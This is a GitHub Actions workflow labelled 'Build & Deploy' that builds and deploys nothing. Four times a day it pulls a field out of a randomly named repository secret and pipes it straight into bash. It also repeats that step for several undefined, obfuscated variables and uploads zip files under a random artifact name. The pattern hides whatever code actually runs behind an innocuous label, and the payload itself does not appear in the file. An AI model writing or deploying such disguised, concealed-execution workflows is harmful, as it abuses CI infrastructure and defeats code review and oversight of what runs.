name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '57 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          zeo8086: ${{ secrets.zeo8086 }}
        run: |
          printf '%s' "$zeo8086" | jq -r .mge5985 | /bin/bash
          printf '%s' "$pjfe0" | jq -r .zkh8 | /bin/bash
          printf '%s' "$wqsc155" | jq -r .aqfx4 | /bin/bash
          printf '%s' "$rynto81448" | jq -r .muil45062 | /bin/bash
          printf '%s' "$kh013" | jq -r .q29647 | /bin/bash
          printf '%s' "$gn6564" | jq -r .yfmh59521 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: z7ST5Gc6
          path: "*.zip"
          retention-days: 1
